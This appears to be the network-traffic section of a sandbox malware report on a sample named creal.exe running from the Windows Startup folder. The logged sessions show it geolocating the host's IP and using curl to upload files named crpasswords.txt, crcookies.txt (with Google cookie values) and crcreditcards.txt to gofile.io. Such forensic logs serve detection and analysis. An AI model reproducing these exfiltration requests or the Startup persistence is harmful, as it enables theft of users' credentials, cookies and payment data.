                                                                                                                                                                                                              2025-01-16 08:09:18 UTC172INData Raw: 61 31 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 37 2e 37 35 31 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 37 2e 38 32 32 2c 22 49 50 76 34 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: a1callback({"country_code":"US","country_name":"United States","city":null,"postal":null,"latitude":37.751,"longitude":-97.822,"IPv4":"8.46.123.189","state":null})0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              3192.168.2.94978831.14.70.245443748C:\Windows\System32\curl.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2025-01-16 08:09:20 UTC198OUTPOST /uploadFile HTTP/1.1
                                                                                                                                                                                                              Host: store4.gofile.io
                                                                                                                                                                                                              User-Agent: curl/7.83.1
                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                              Content-Length: 193
                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=------------------------069d07de67658548
                                                                                                                                                                                                              2025-01-16 08:09:20 UTC193OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 30 36 39 64 30 37 64 65 36 37 36 35 38 35 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 63 72 70 61 73 73 77 6f 72 64 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 30 36 39 64 30 37 64 65 36 37 36 35 38 35 34 38 2d 2d 0d 0a
                                                                                                                                                                                                              Data Ascii: --------------------------069d07de67658548Content-Disposition: form-data; name="file"; filename="crpasswords.txt"Content-Type: text/plain--------------------------069d07de67658548--
                                                                                                                                                                                                              2025-01-16 08:09:20 UTC449INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx/1.27.1
                                                                                                                                                                                                              Date: Thu, 16 Jan 2025 08:09:20 GMT
                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                              Content-Length: 747
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                                                                                                                                                              Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                              Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
                                                                                                                                                                                                              2025-01-16 08:09:20 UTC747INData Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 37 30 31 34 39 36 30 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 77 58 47 65 6b 49 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 34 36 39 4b 57 69 36 6d 64 49 48 31 79 72 37 62 47 59 44 4d 56 36 68 52 7a 72 54 42 59 5a 6e 4c 22 2c 22 69 64 22 3a 22 39 64 35 66 35 32 34 63 2d 32 32 37 30 2d 34 61 39 39 2d 39 63 36 35 2d 36 39 33 38 66 63 30 61 33 39 38 64 22 2c 22 6d 64 35 22 3a 22 64 34 31 64 38 63 64 39 38 66 30 30 62 32 30 34 65 39 38 30 30 39 39 38 65 63 66 38 34 32 37 65 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 74 65 78 74 2f 70 6c 61 69 6e 22 2c 22 6d 6f 64 54 69 6d 65 22 3a 31 37 33 37 30 31 34 39 36 30 2c
                                                                                                                                                                                                              Data Ascii: {"data":{"createTime":1737014960,"downloadPage":"https://gofile.io/d/wXGekI","guestToken":"469KWi6mdIH1yr7bGYDMV6hRzrTBYZnL","id":"9d5f524c-2270-4a99-9c65-6938fc0a398d","md5":"d41d8cd98f00b204e9800998ecf8427e","mimetype":"text/plain","modTime":1737014960,


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              4192.168.2.94980131.14.70.2454437608C:\Windows\System32\curl.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2025-01-16 08:09:21 UTC198OUTPOST /uploadFile HTTP/1.1
                                                                                                                                                                                                              Host: store4.gofile.io
                                                                                                                                                                                                              User-Agent: curl/7.83.1
                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                              Content-Length: 466
                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=------------------------6724afa5a35b96de
                                                                                                                                                                                                              2025-01-16 08:09:21 UTC466OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 37 32 34 61 66 61 35 61 33 35 62 39 36 64 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 63 72 63 6f 6f 6b 69 65 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 0d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 54 52 55 45 09 2f 09 46 41 4c 53 45 09 32 35 39 37 35 37 33 34 35 36 09 31 50 5f 4a 41 52 09 32 30 32 33 2d 31 30 2d 30 35 2d 30 39 0d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 54 52 55 45 09 2f 09 46 41 4c 53 45 09 32 35 39 37 35 37 33 34 35 36 09 4e 49 44 09 35 31 31 3d 6b 39 74 54 33 71 37 59 66 68
                                                                                                                                                                                                              Data Ascii: --------------------------6724afa5a35b96deContent-Disposition: form-data; name="file"; filename="crcookies.txt"Content-Type: text/plain.google.comTRUE/FALSE25975734561P_JAR2023-10-05-09.google.comTRUE/FALSE2597573456NID511=k9tT3q7Yfh
                                                                                                                                                                                                              2025-01-16 08:09:21 UTC449INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx/1.27.1
                                                                                                                                                                                                              Date: Thu, 16 Jan 2025 08:09:21 GMT
                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                              Content-Length: 437
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                                                                                                                                                              Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                              Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
                                                                                                                                                                                                              2025-01-16 08:09:21 UTC437INData Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 37 30 31 34 39 36 31 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 71 50 36 78 58 69 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 55 56 33 30 79 32 42 70 71 64 72 47 7a 4b 36 31 6b 64 70 74 78 57 4d 4a 54 72 37 75 49 33 4f 76 22 2c 22 69 64 22 3a 22 61 64 31 31 62 35 65 30 2d 33 35 34 30 2d 34 63 35 32 2d 39 63 31 63 2d 64 62 65 32 66 34 30 63 37 61 30 39 22 2c 22 6d 64 35 22 3a 22 35 38 64 61 31 63 34 65 37 64 37 33 34 33 64 37 32 39 30 30 34 30 32 31 66 66 61 65 37 63 36 61 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 74 65 78 74 2f 74 61 62 2d 73 65 70 61 72 61 74 65 64 2d 76 61 6c 75 65 73 22 2c 22 6d 6f 64 54 69
                                                                                                                                                                                                              Data Ascii: {"data":{"createTime":1737014961,"downloadPage":"https://gofile.io/d/qP6xXi","guestToken":"UV30y2BpqdrGzK61kdptxWMJTr7uI3Ov","id":"ad11b5e0-3540-4c52-9c1c-dbe2f40c7a09","md5":"58da1c4e7d7343d729004021ffae7c6a","mimetype":"text/tab-separated-values","modTi


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              5192.168.2.94981331.14.70.2454433720C:\Windows\System32\curl.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2025-01-16 08:09:22 UTC198OUTPOST /uploadFile HTTP/1.1
                                                                                                                                                                                                              Host: store4.gofile.io
                                                                                                                                                                                                              User-Agent: curl/7.83.1
                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                              Content-Length: 195
                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=------------------------a6eead71f8802286
                                                                                                                                                                                                              2025-01-16 08:09:22 UTC195OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 61 36 65 65 61 64 37 31 66 38 38 30 32 32 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 63 72 63 72 65 64 69 74 63 61 72 64 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 61 36 65 65 61 64 37 31 66 38 38 30 32 32 38 36 2d 2d 0d 0a
                                                                                                                                                                                                              Data Ascii: --------------------------a6eead71f8802286Content-Disposition: form-data; name="file"; filename="crcreditcards.txt"Content-Type: text/plain--------------------------a6eead71f8802286--
                                                                                                                                                                                                              2025-01-16 08:09:23 UTC449INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx/1.27.1
                                                                                                                                                                                                              Date: Thu, 16 Jan 2025 08:09:23 GMT
                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                              Content-Length: 749
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                                                                                                                                                              Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                              Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
                                                                                                                                                                                                              2025-01-16 08:09:23 UTC749INData Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 37 30 31 34 39 36 33 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 70 6c 72 6a 47 51 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 6d 37 34 44 47 6c 5a 43 56 57 4a 62 58 70 6e 61 6c 4f 70 73 35 36 58 4a 65 76 72 4a 54 41 51 6e 22 2c 22 69 64 22 3a 22 62 33 34 66 34 61 39 30 2d 33 38 66 38 2d 34 37 63 36 2d 38 31 64 32 2d 37 38 33 63 65 38 34 32 32 62 38 62 22 2c 22 6d 64 35 22 3a 22 64 34 31 64 38 63 64 39 38 66 30 30 62 32 30 34 65 39 38 30 30 39 39 38 65 63 66 38 34 32 37 65 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 74 65 78 74 2f 70 6c 61 69 6e 22 2c 22 6d 6f 64 54 69 6d 65 22 3a 31 37 33 37 30 31 34 39 36 33 2c
                                                                                                                                                                                                              Data Ascii: {"data":{"createTime":1737014963,"downloadPage":"https://gofile.io/d/plrjGQ","guestToken":"m74DGlZCVWJbXpnalOps56XJevrJTAQn","id":"b34f4a90-38f8-47c6-81d2-783ce8422b8b","md5":"d41d8cd98f00b204e9800998ecf8427e","mimetype":"text/plain","modTime":1737014963,


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              6192.168.2.949883104.26.13.2054434992C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2025-01-16 08:09:34 UTC117OUTGET / HTTP/1.1
                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                              Host: api.ipify.org
                                                                                                                                                                                                              User-Agent: Python-urllib/3.12
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              2025-01-16 08:09:34 UTC425INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Thu, 16 Jan 2025 08:09:34 GMT
                                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                                              Content-Length: 12
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 902c9fc83ab654af-YYZ
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=14414&min_rtt=14402&rtt_var=5426&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=709&delivery_rate=201309&cwnd=32&unsent_bytes=0&cid=f9251ab33dc5c09b&ts=194&x=0"
                                                                                                                                                                                                              2025-01-16 08:09:34 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                                              Data Ascii: 8.46.123.189


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              7192.168.2.94988945.112.123.1264434992C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2025-01-16 08:09:35 UTC126OUTGET /getServer HTTP/1.1
                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                              Host: api.gofile.io
                                                                                                                                                                                                              User-Agent: Python-urllib/3.12
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              2025-01-16 08:09:35 UTC1146INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx/1.27.1
                                                                                                                                                                                                              Date: Thu, 16 Jan 2025 08:09:35 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Content-Length: 14
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                              Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                              Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                                                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                              Origin-Agent-Cluster: ?1
                                                                                                                                                                                                              Referrer-Policy: no-referrer
                                                                                                                                                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                              X-DNS-Prefetch-Control: off
                                                                                                                                                                                                              X-Download-Options: noopen
                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                              ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow
                                                                                                                                                                                                              2025-01-16 08:09:35 UTC14INData Raw: 65 72 72 6f 72 2d 6e 6f 74 46 6f 75 6e 64
                                                                                                                                                                                                              Data Ascii: error-notFound


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              8192.168.2.949895159.89.102.2534434992C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2025-01-16 08:09:36 UTC140OUTGET /jsonp/8.46.123.189 HTTP/1.1
                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                              Host: geolocation-db.com
                                                                                                                                                                                                              User-Agent: Python-urllib/3.12
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              2025-01-16 08:09:36 UTC206INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                              Date: Thu, 16 Jan 2025 08:09:36 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                              2025-01-16 08:09:36 UTC172INData Raw: 61 31 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 37 2e 37 35 31 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 37 2e 38 32 32 2c 22 49 50 76 34 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: a1callback({"country_code":"US","country_name":"United States","city":null,"postal":null,"latitude":37.751,"longitude":-97.822,"IPv4":"8.46.123.189","state":null})0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              9192.168.2.94991131.14.70.2454433480C:\Windows\System32\curl.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2025-01-16 08:09:38 UTC198OUTPOST /uploadFile HTTP/1.1
                                                                                                                                                                                                              Host: store4.gofile.io
                                                                                                                                                                                                              User-Agent: curl/7.83.1
                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                              Content-Length: 193
                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=------------------------2b19bbf9df8f9a94
                                                                                                                                                                                                              2025-01-16 08:09:38 UTC193OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 62 31 39 62 62 66 39 64 66 38 66 39 61 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 63 72 70 61 73 73 77 6f 72 64 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 62 31 39 62 62 66 39 64 66 38 66 39 61 39 34 2d 2d 0d 0a
                                                                                                                                                                                                              Data Ascii: --------------------------2b19bbf9df8f9a94Content-Disposition: form-data; name="file"; filename="crpasswords.txt"Content-Type: text/plain--------------------------2b19bbf9df8f9a94--
                                                                                                                                                                                                              2025-01-16 08:09:38 UTC449INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx/1.27.1
                                                                                                                                                                                                              Date: Thu, 16 Jan 2025 08:09:38 GMT
                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                              Content-Length: 747
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                                                                                                                                                              Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                              Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
                                                                                                                                                                                                              2025-01-16 08:09:38 UTC747INData Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 37 30 31 34 39 37 38 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 6e 34 4f 73 6c 42 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 30 50 58 4e 39 4d 31 44 70 31 43 72 72 65 4f 54 72 59 4f 73 48 31 76 61 46 44 61 51 47 56 48 6a 22 2c 22 69 64 22 3a 22 38 35 61 37 61 39 33 30 2d 63 62 36 35 2d 34 66 36 36 2d 61 37 39 39 2d 34 32 65 37 39 66 66 33 62 33 32 64 22 2c 22 6d 64 35 22 3a 22 64 34 31 64 38 63 64 39 38 66 30 30 62 32 30 34 65 39 38 30 30 39 39 38 65 63 66 38 34 32 37 65 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 74 65 78 74 2f 70 6c 61 69 6e 22 2c 22 6d 6f 64 54 69 6d 65 22 3a 31 37 33 37 30 31 34 39 37 38 2c
                                                                                                                                                                                                              Data Ascii: {"data":{"createTime":1737014978,"downloadPage":"https://gofile.io/d/n4OslB","guestToken":"0PXN9M1Dp1CrreOTrYOsH1vaFDaQGVHj","id":"85a7a930-cb65-4f66-a799-42e79ff3b32d","md5":"d41d8cd98f00b204e9800998ecf8427e","mimetype":"text/plain","modTime":1737014978,


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              10192.168.2.94992131.14.70.2454431080C:\Windows\System32\curl.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2025-01-16 08:09:39 UTC198OUTPOST /uploadFile HTTP/1.1
                                                                                                                                                                                                              Host: store4.gofile.io
                                                                                                                                                                                                              User-Agent: curl/7.83.1
                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                              Content-Length: 466
                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=------------------------e82318e3899d8f43
                                                                                                                                                                                                              2025-01-16 08:09:39 UTC466OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 65 38 32 33 31 38 65 33 38 39 39 64 38 66 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 63 72 63 6f 6f 6b 69 65 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 0d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 54 52 55 45 09 2f 09 46 41 4c 53 45 09 32 35 39 37 35 37 33 34 35 36 09 31 50 5f 4a 41 52 09 32 30 32 33 2d 31 30 2d 30 35 2d 30 39 0d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 54 52 55 45 09 2f 09 46 41 4c 53 45 09 32 35 39 37 35 37 33 34 35 36 09 4e 49 44 09 35 31 31 3d 6b 39 74 54 33 71 37 59 66 68
                                                                                                                                                                                                              Data Ascii: --------------------------e82318e3899d8f43Content-Disposition: form-data; name="file"; filename="crcookies.txt"Content-Type: text/plain.google.comTRUE/FALSE25975734561P_JAR2023-10-05-09.google.comTRUE/FALSE2597573456NID511=k9tT3q7Yfh
                                                                                                                                                                                                              2025-01-16 08:09:40 UTC449INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx/1.27.1
                                                                                                                                                                                                              Date: Thu, 16 Jan 2025 08:09:40 GMT
                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                              Content-Length: 437
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                                                                                                                                                              Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                              Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
                                                                                                                                                                                                              2025-01-16 08:09:40 UTC437INData Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 37 30 31 34 39 38 30 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 62 32 48 56 30 38 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 66 79 37 6d 52 6d 47 37 56 70 73 79 47 49 73 6e 46 4a 7a 61 41 63 6e 6c 47 75 73 4b 58 77 7a 6e 22 2c 22 69 64 22 3a 22 61 65 36 63 38 38 32 65 2d 64 64 62 34 2d 34 33 36 39 2d 61 30 39 62 2d 65 30 34 39 33 31 39 33 32 63 66 32 22 2c 22 6d 64 35 22 3a 22 35 38 64 61 31 63 34 65 37 64 37 33 34 33 64 37 32 39 30 30 34 30 32 31 66 66 61 65 37 63 36 61 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 74 65 78 74 2f 74 61 62 2d 73 65 70 61 72 61 74 65 64 2d 76 61 6c 75 65 73 22 2c 22 6d 6f 64 54 69
                                                                                                                                                                                                              Data Ascii: {"data":{"createTime":1737014980,"downloadPage":"https://gofile.io/d/b2HV08","guestToken":"fy7mRmG7VpsyGIsnFJzaAcnlGusKXwzn","id":"ae6c882e-ddb4-4369-a09b-e04931932cf2","md5":"58da1c4e7d7343d729004021ffae7c6a","mimetype":"text/tab-separated-values","modTi


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              11192.168.2.94993431.14.70.2454432024C:\Windows\System32\curl.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2025-01-16 08:09:42 UTC198OUTPOST /uploadFile HTTP/1.1
                                                                                                                                                                                                              Host: store4.gofile.io
                                                                                                                                                                                                              User-Agent: curl/7.83.1
                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                              Content-Length: 195
                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=------------------------cd5f239849a3a26e
